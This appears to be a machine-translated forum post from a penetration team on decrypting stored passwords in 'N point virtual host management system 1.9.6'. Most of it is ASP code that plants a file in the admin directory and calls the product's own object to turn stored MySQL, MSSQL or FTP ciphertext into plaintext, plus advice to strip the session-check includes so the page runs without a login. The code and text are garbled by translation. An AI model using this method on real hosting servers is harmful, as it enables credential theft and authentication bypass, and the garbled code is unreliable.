Ciphertext decryption of point n vm version 1.9.6

0x1: CauseHow can I decrypt the ciphertext sent by the recently added student? I remember the problem of ciphertext decryption in this version, whether in the 90sec t00ls dark moon Information Security Forum, there are many questions about this. Previously, the 1.9.3 version of the script was released on the Internet. Many people in 1.9.6 said it could not be used. The same problem was also found in many forums. In the dark month, the technical penetration team, as a technical team, I would like to share with you the decryption method.0x2: Test EnvironmentVMware9.0 wind2003 zkeysphp N point virtual host Management System 1.9.6 Personal Edition this test environment. Set up and configure0x3: analysis processWe usually look for a database connection. During the development, the general process is to encrypt the database connection. For example, php is usually such an encrypted md5 (request ['Moon ']). then it is passed into the SQL statement. This is much easier to find. Because the environment is only installed with mysql, search for mysql related pages and find admin/mysql. asp. Now let's come in and see 01 <! -- # Include file = "sessioncolck. asp" --> 02 <! -- # Include file = "pagesession/CS4.asp" --> 03 <! -- # Include file = "../inc/conn. asp" --> 04 <! -- # Include file = "../inc/char. asp" --> 05 <! -- # Include file = ".. /inc/function. asp "--> 06 0x4: Write expThe n-point system is random in encryption, so it is not reliable to write and decrypt the script separately. You need to create a new file under the admin directory of the n-Point System (hash here. asp), remember not to copy the code just now because the encryption characters are different locally. 01 <! -- # Include file = "sessioncolck. asp" --> 02 <! -- # Include file = "pagesession/CS4.asp" --> 03 <! -- # Include file = "../inc/conn. asp" --> 04 <! -- # Include file = "../inc/char. asp" --> 05 <! -- # Include file = ".. /inc/function. asp "--> 06 <% 07 set iishost = server. createobject ("npoint. host ") 08 pass = iishost. eduserpassword ("the ciphertext string can be mysql mmsql ftp", 0) 09 response. write pass 10 11%>
1 <! -- # Include file = "sessioncolck. asp" --> 2 <! -- # Include file = "pagesession/CS4.asp" --> do not use these two segments because you want to use backend session verification without account or password. You need to forge the two segments and directly remove the simplified ones. <! -- # Include file = "../inc/conn. asp" --> 2 <! -- # Include file = "../inc/char. asp" --> 3 <! -- # Include file = ".. /inc/function. asp "--> 4 <% 5 set iishost = server. createobject ("npoint. host ") 6 pass = iishost. eduserpassword ("ciphertext string", 0) 7 response. write pass 8 9%>0x5: provenThe database mysql encryption script is as follows: 1 <! -- # Include file = "../inc/conn. asp" --> 2 <! -- # Include file = "../inc/char. asp" --> 3 <! -- # Include file = ".. /inc/function. asp "--> 4 <% 5 set iishost = server. createobject ("npoint. host ") 6 pass = iishost. eduserpassword ("Login @ GDOIOAC @ OMKJGLE @ OCBFMEH @ BGNKJKAH @ JGNA @ ODMMOI @ login @ GIAD @ LCEMBGGDCJFGDFCOJ @ NAK @ B", 0) 7 response. write pass 8 9%> decryption0x5 SummaryThis case is a typical decryption process. I hope all the friends can learn some useful methods for themselves and follow up on any questions. For example, if you want to study paid virtual hosts, you can contact yourself to find something useful to everyone as long as you have an environment. A friend who wishes to repost this case will bring the blog link of xiaobian